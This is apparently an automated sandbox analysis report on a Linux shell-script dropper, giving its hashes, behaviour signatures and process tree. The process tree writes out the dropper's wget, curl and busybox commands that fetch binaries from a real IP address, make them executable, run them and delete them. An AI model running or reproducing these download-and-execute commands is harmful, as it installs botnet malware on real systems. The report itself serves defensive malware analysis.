Analysis
-
max time kernel
42s -
max time network
130s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/11/2024, 08:14
Static task
static1
Behavioral task
behavioral1
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
-
Size
10KB
-
MD5
77bee17b866cc1fd41dd0e6795516a37
-
SHA1
fbe900100ffafc804c69a94b5ee81405100c02e5
-
SHA256
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f
-
SHA512
6284423f5b87140261dee3ec564d00d38f4dd59dd41f86a9d342027230a4012db3224b4cb8e9341a4a30ffcb73b822319b88a65d51c55678886b6a708fa62d4d
-
SSDEEP
192:YnrtGG7NhRmOJQM4+2IJ7Rk8UD+u0KCaHHRYbAQrHB+GvrHB+GRnrtGGJNhRmOuX:8NhRmOJQM4+xJ7dfKOAQrHB+GvrHB+Gy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1577 chmod 1583 chmod 1613 chmod 1681 chmod 1571 chmod 1645 chmod 1559 chmod 1595 chmod 1619 chmod 1675 chmod 1693 chmod 1553 chmod 1565 chmod 1607 chmod 1657 chmod 1547 chmod 1601 chmod 1651 chmod 1669 chmod 1699 chmod 1535 chmod 1589 chmod 1625 chmod 1637 chmod 1541 chmod 1631 chmod 1663 chmod 1687 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n 1536 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr 1542 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij 1548 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR 1554 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK 1560 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll 1566 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD 1572 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd 1578 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv 1584 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI 1590 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 1596 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH 1602 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb 1608 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN 1614 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb 1620 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN 1626 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n 1632 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr 1638 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij 1646 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR 1652 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK 1658 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll 1664 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv 1670 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI 1676 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 1682 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH 1688 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD 1694 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd 1700 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n curl File opened for modification /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij curl File opened for modification /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH curl File opened for modification /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD curl File opened for modification /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll curl File opened for modification /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr curl File opened for modification /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n curl File opened for modification /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr curl File opened for modification /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv curl File opened for modification /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 curl File opened for modification /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH curl File opened for modification /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb curl File opened for modification /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN curl File opened for modification /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN curl File opened for modification /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR curl File opened for modification /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll curl File opened for modification /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv curl File opened for modification /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd curl File opened for modification /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb curl File opened for modification /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK curl File opened for modification /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK curl File opened for modification /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij curl File opened for modification /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI curl File opened for modification /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI curl File opened for modification /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 curl File opened for modification /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd curl File opened for modification /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR curl File opened for modification /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD curl
Processes
-
/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh1⤵PID:1526
-
/bin/rm/bin/rm bins.sh2⤵PID:1527
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:1534
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:1537
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:1540
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:1543
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:1546
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:1549
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:1552
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:1555
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:1558
-
-
/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:1561
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:1564
-
-
/bin/chmodchmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:1567
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:1570
-
-
/bin/chmodchmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:1573
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:1576
-
-
/bin/chmodchmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:1579
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:1580
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:1582
-
-
/bin/chmodchmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:1585
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:1586
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:1588
-
-
/bin/chmodchmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:1591
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:1592
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:1594
-
-
/bin/chmodchmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:1597
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:1600
-
-
/bin/chmodchmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:1603
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:1606
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:1609
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:1610
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:1612
-
-
/bin/chmodchmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:1615
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:1618
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:1621
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:1624
-
-
/bin/chmodchmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:1627
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:1630
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:1633
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:1636
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:1639
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:1642
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:1645
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:1646
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:1647
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:1648
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Writes file to tmp directory
PID:1649
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:1650
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:1651
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:1652
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:1653
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:1654
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Writes file to tmp directory
PID:1655
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:1656
-
-
/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:1659
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:1660
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:1662
-
-
/bin/chmodchmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Executes dropped EXE
PID:1664
-
-
/bin/rmrm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:1665
-
-
